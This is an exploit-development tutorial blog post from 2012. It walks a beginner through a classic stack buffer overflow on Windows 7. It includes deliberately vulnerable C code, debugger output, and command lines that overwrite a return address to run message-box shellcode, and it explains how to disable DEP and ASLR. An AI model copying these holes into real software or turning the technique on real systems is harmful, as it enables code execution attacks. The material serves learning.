Hurdles for a beginner to exploit a simple vulnerability on modern Windows

09 Dec 2012

tl;dr This is basically a guide for newbies to the world of "vulnerability research" (exploit development). It shows how hard it is to get the simple exploit samples from books and tutorials to work on modern Windows using a modern compiler. This is just for fun, to show all the pain points you are likely to encounter. I want to show that the simple examples you find in tutorials no longer work, so I manipulate a vulnerable app until it can be exploited with a classic/simple buffer overflow, without knowledge of any more advanced exploitation concepts.

I am not good at exploit development: pros will likely see some dumb mistakes on my part (some of which are on purpose, to show what a newbie would likely do). I don't yet have a Windows 8 system or the latest Visual Studio (VS 2012, which was officially released on September 12, 2012). On my Windows 7 x64 system, I have Visual Studio 2010. So I start by creating a default empty project.

First write some vulnerable code

This is actually a little difficult if you want to just go by what the books say. Let's start with code from two popular books. You have almost the same example on page 24 of both "The Shellcoder's Handbook, 1st edition" and "Hacking: The Art of Exploitation, 1st edition". This is the most basic vulnerability for a stack overflow (with headers for Windows compilation).

#include <string.h>
#include <stdio.h>

int main(int argc, char **argv) {
    char little_array[4];
    strcpy(little_array,argv[1]);
}

It compiles, but you get a warning about using strcpy:

c:\users\simpleuser\documents\visual studio 2010\projects\test\test\test.cpp(7): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
1>          c:\program files (x86)\microsoft visual studio 10.0\vc\include\string.h(105) : see declaration of 'strcpy'

Running it with test.exe a works with no problems: it just exits, like it should. But try test.exe aaaaaaaa and it shows an error:

So it looks like there are some protections, but we'll get to those later. The default build from Visual Studio is the debug build, which you normally don't want to send to customers, so switch to the release build and recompile. Now it exits fine. That's not what we expected.

Getting it to crash

Let's look at the assembly:

The strcpy has been compiled as:

.text:00401010                         loc_401010:                             ; CODE XREF: main+15j
.text:00401010 8A 08                                   mov     cl, [eax]
.text:00401012 40                                      inc     eax
.text:00401013 84 C9                                   test    cl, cl
.text:00401015 75 F9                                   jnz     short loc_401010

What is happening here is that each byte of argv[1] is loaded into cl (the low byte of the ecx register), and the loop exits when that byte is zero, but the bytes are never written anywhere. They are only checked, so this was compiled to completely pointless code. This makes sense: we never use the little_array variable, so the compiler could have skipped the copy entirely.

So let's use the little_array var by changing our code to this:

    char little_array[4];
    strcpy(little_array,argv[1]);
    printf("%s", little_array);

Now when we run test.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA it just prints AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA and exits. No overflow. What happened this time?

This time our strcpy is actually doing something:

.text:00401010                         loc_401010:                             ; CODE XREF: sub_401000+18j
.text:00401010 8A 08                                   mov     cl, [eax]
.text:00401012 88 0C 02                                mov     [edx+eax], cl
.text:00401015 40                                      inc     eax
.text:00401016 84 C9                                   test    cl, cl
.text:00401018 75 F6                                   jnz     short loc_401010

But the data is not going to be copied over our return address, as shown here in this windbg session.

Knowing that we need to overwrite a return address, let's change our code so it uses a function.

#include <string.h>
#include <stdio.h>

void overflow(char *str) {
    char little_array[4];
    strcpy(little_array,str);
    printf("%s", little_array);
}

int main(int argc, char **argv) {
    overflow(argv[1]);
}

This is basically the code from the appendix of "A Bug Hunter's Diary" on page 150 (except his code doesn't have the printf). Running again, it still doesn't crash! Looking in IDA, we can see the function was inlined, so we got almost the same code as before.

Ok, so now redefine our function so it won't be inlined:

__declspec(noinline) void overflow(char *str) {

This time it finally crashes!

Looking at IDA, we can see things were compiled how we expected now.

Nothing so far was any sort of protection mechanism in Windows. I just wanted to show all the problems you'll probably run into if you try to exploit something compiled with a modern Visual Studio.

Going from crashable to exploitable

Now we can crash our application, but can we exploit it? This is the situation reached by many vulnerability analysts today. They can crash an app, and maybe that allows for a remote Denial of Service attack, but no one really gets too proud of finding a crash. You want arbitrary code execution!

So you open up windbg and run your program with the argument AAAABBBBCCCCDDDDEEEEFFFF in order to figure out which one controls the return address, and windbg gives you:

(2378.1c30): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
43434343 ??              ???

So if you change the CCCC part of your argument you can control the return address. Where to send it? Well, the standard method is to include your shellcode with your input, so you'll probably bring up cygwin and do something like:

$ ./test.exe "AAAABBBB`perl -e 'printf("\x61\x61\x61\x61")'``cat w32-msgbox-shellcode-esp.bin`"

w32-msgbox-shellcode-esp.bin just pops up a "hello world" message box.

The goal here is to set that \x61\x61\x61\x61 (aaaa) to the start of the shellcode.

But it just prints out the argument as if nothing happened. Why doesn't the "test.exe has stopped working" message pop up? Honestly, I have no idea. The program did crash, but Cygwin somehow stops werfault.exe from showing the crash message. You can still see the crash in windbg: attach to your bash.exe process and give the following command to debug child processes. When you then try to crash test.exe, about a dozen breakpoints will hit (each indicating that a new process is starting) before test.exe finally runs and causes the "Access Violation".

.childdbg 1

Using cygwin and windbg like that is annoying, so you could try echo'ing your desired argument value to a file with:

$ echo "AAAABBBB`perl -e 'printf("\x61\x61\x61\x61")'``cat w32-msgbox-shellcode-esp.bin`" > file.txt

Then in your cmd.exe prompt do:

set /p MYARG=<file.txt
test.exe "%MYARG%"

That is just one way of doing it; anything else that gets the bytes into the argument works too.

So now you try to set that \x61\x61\x61\x61 to the address of the start of your shellcode, but then you notice that this address changes every time you run the program. This is ASLR. You also know that DEP is going to stop the shellcode from executing, so to exploit the app you need to disable both DEP and ASLR when you build it (in Visual Studio these are linker settings: /NXCOMPAT:NO and /DYNAMICBASE:NO).

Now you find that your shellcode is always at the address 0x003d2bc1 (this may vary), but the high byte of that address is 0x00. A C string ends at the first null byte, so the address would cut the argument short and strcpy would never copy anything that follows it.

In the real world, you would now have to find a sequence of executable code somewhere in memory, at an address that does not contain a null, which somehow gets you back to your shellcode. For example, by some miracle you might find something like this:

pop eax
xor eax, 0xff000000
push eax
ret

Let's say this was at location 0x41424344 (ABCD). Since 0x003d2bc1 (the location of your shellcode) xor'd with 0xff000000 is 0xff3d2bc1, you could overwrite the return address with the address of this code and put the xor'd value right after it, where the pop eax will pick it up (note that the bytes of each address are reversed):

$ echo "AAAABBBBDCBA`perl -e 'printf("\xc1\x2b\x3d\xff")'``cat w32-msgbox-shellcode-esp.bin`"

Since we are just trying to learn exploit development, the other option, for us, is to just change our code. :)

#include <string.h>
#include <stdio.h>

__declspec(noinline) void overflow(char *str, int size) {
    char little_array[4];
    memcpy(little_array,str,size);
    printf("%s", little_array);
}

int main(int argc, char **argv) {
    char str[256];
    fgets(str, sizeof(str), stdin);
    
    int length = 0;
    for (; length<sizeof(str)-1; length++) {
        if (str[length]=='\n') break;
    }
    str[length]=0;

    overflow(str, length+1);
}

This new code just reads data in from stdin, and then there is a little length calculation that you can ignore (as long as your input does not have a \n (0x0a) character).

Now, because we will have a null in our input, we need to change how we create the input. In cygwin do:

perl -e 'printf("AAAABBBB\x40\xfe\x18\x00")' > file.txt
cat w32-msgbox-shellcode-esp.bin >> file.txt

Now to try to exploit your app, run this from a dos command prompt:

type file.txt | test.exe

(type is the DOS equivalent of cat)

So you try running it, and it doesn't work. You debug it, and it looks like your shellcode isn't being read all the way. The reason is the 0x1a byte in the shellcode: stdin is in text mode by default, and in text mode the C runtime treats 0x1a (Ctrl-Z) as end-of-file. This has nothing to do with the 0x0a restriction from the length calculation. So you need to change your code again so that it calls _setmode to switch stdin to binary mode.

#include <string.h>
#include <stdio.h>
#include <io.h>
#include <fcntl.h>

// Deliberately vulnerable: copies size bytes into a 4-byte buffer.
__declspec(noinline) void overflow(char *str, int size) {
    char little_array[4];
    memcpy(little_array,str,size);
    printf("%s", little_array);
}

int main(int argc, char **argv) {
    // Binary mode, so a 0x1a byte in the input does not cut it short.
    _setmode(_fileno(stdin), _O_BINARY);

    char str[256];
    fgets(str, sizeof(str), stdin);
    
    // Input length: everything up to the first '\n' (null bytes are allowed).
    int length = 0;
    for (; length<sizeof(str)-1; length++) {
        if (str[length]=='\n') break;
    }
    str[length]=0;

    overflow(str, length+1);
}

Now it finally works! You may need to change the address value, but it should finally pop up the "hello world" message.

Summary

Use that last version of the code and turn off DEP and ASLR. This code looks weird, but it's not weird because it's bypassing compiler protections or anything: It just looks weird because of Windows and compiler oddities. Who knew writing vulnerable code was so hard? :)